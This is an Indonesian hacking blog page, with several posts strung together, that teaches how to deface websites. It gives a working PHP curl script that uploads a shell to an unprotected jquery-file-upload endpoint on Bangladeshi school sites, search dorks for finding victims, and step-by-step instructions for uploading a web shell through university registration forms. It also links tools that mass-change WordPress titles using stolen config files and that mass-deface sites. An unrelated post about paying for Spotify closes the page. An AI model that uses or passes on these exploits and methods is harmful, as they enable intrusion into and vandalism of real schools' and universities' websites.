Irfan Prasetya Blog

hallo. kali ini ane pengen share cara deface school Bangladesh. ya kyk bug balitbang lah kalo di indo. Bugnya ada di plugin jquery-file-upload. yaudah langsung aja. dork: Developed by exdmania script: <?php $file = "kkk.htm"; //shell ataupun script deface $post = array("files[]" => "@$file", ); $ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/"); curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch2, CURLOPT_POST, 1); curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch2); echo $data."\n\n\n"; ?> POC: hasil: /assets/super_admin/vendor/jquery-file-upload/server/php/files/ keep share :)

Kali ini ane pengen share website Universitas dengan PMB Register Umumnya setiap website universitas menyediakan tempat pendaftaran online bagi mahasiswa baru. Oke kita langsung saja.. Dork: inurl:"pmb." inurl:"pmb/home/" inurl:"pmb." intext:"pendaftaran" 1. Klik Pendaftaran Online 2. Akan muncul kolom pendaftaran dan isi semua kolom yang tersedia disitu. Untuk dibagian form upload FOTO ANDA diatas tombol KIRIM DATA  upload shell/uploader yang telah di rename ke bentuk .jpg terlebih dahulu. 3. Aktifkan tamper data klik start lalu klik tombol KIRIM DATA yang ada dibagian bawah sekali. atau bagi yang menggunakan chrome, bisa menggunakan request maker. 4. klik tamper 5. Rename shell/uploader yang telah di rubah ke bentuk .jpg tadi  dan klik ok jika selesai. 6. selesai klik ok tadi dan akan muncul formulir pendaftaran seperti dibawah dan juga akan muncul link shell/uploader kita tadi seperti gambar dibawah. copy link-nya di bar baru dan paste. 7. ini...

Lansunggg aja gannn sedott sourcenyaaaa: http://pastebin.com/t8PvtP0h Cara Pake nyaa : 1. Masukin Toolsnya Ke Shell Backdoor / Hosting 2. Masukin Targetnya kyk di SS gan Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1: http://pastebin.com/YFBhSsT6 Salam IndoXploit

Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs. jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu. ngk deface sih, tapi bisa masuk mirror kok ;v jadi kita cuma masukin http://blabla.com/configs/ ada 2 file, 1 file untuk websitenya. 1 file untuk kita buka di cmd/terminal. link_index.php http://pastebin.com/7jLauxGz ini nantinya yang kita buka pake cmd/terminal. php link_index.php edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked) link_title_2.php http://pastebin.com/9jT5Qvz5 upload diwebsite yg 1 server sama configsnya. ngk usah diedit. POC: kenapa cuma ganti title ? kenapa ngk deface aja ? wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin. jadi ganti title aja, karena ganti title cuma ...

Kali ini ane pengen bagikan script mass deface selama ini mungkin kita cuma memakainya saja. karena biasanya tool ini sudah tersedia di shell. Sebenarnya script ini cukup simple. tapi cukup bikin puyeng juga kalo belum dapet logikanya. POC: Script: http://pastebin.com/SA7uKgiQ #KeepShare

Hello Guys! GCB balik lagi dengan posting yang kali ini tentang SPOTIFY, ya betul read : spotifai. Ini bukan promosi tapi sebenarnya postingan kali ini menceritakan pengalaman bagaimana cara pembayaran spotify atau berlangganan spotify tanpa menggunakan kartu kredit. Gamers sendiri merasakan bagaimana nyamannya streaming lagu dengan banyak database dari pada download ber-GB lagu (tentu spotify ini juga mendukung para pembuat musik). Spotify baru saja hadir akhir maret di Indonesia, ini merupakan kabar gembira bagi pengguna spotify dan yang ingin mencoba layanan spotify, karena tidak perlu mendengarkan lagu spotify menggunakan VPN a.k.a spotify tanpa VPN. Sebelumnya gamers sendiri telah merasakan bagaimana mendengarkan spotify menggunakan VPN. Namun sekarang sudah resmi hadir di Indonesia, dengan menggandeng beberapa label terkenal di Indonesia, lagu-lagu spotify ini tentu tidak kalah lengkap dengan Apple Music maupun JOOX yang notabene lebih dulu hadir di Indonesia.  (Tampilan Spo...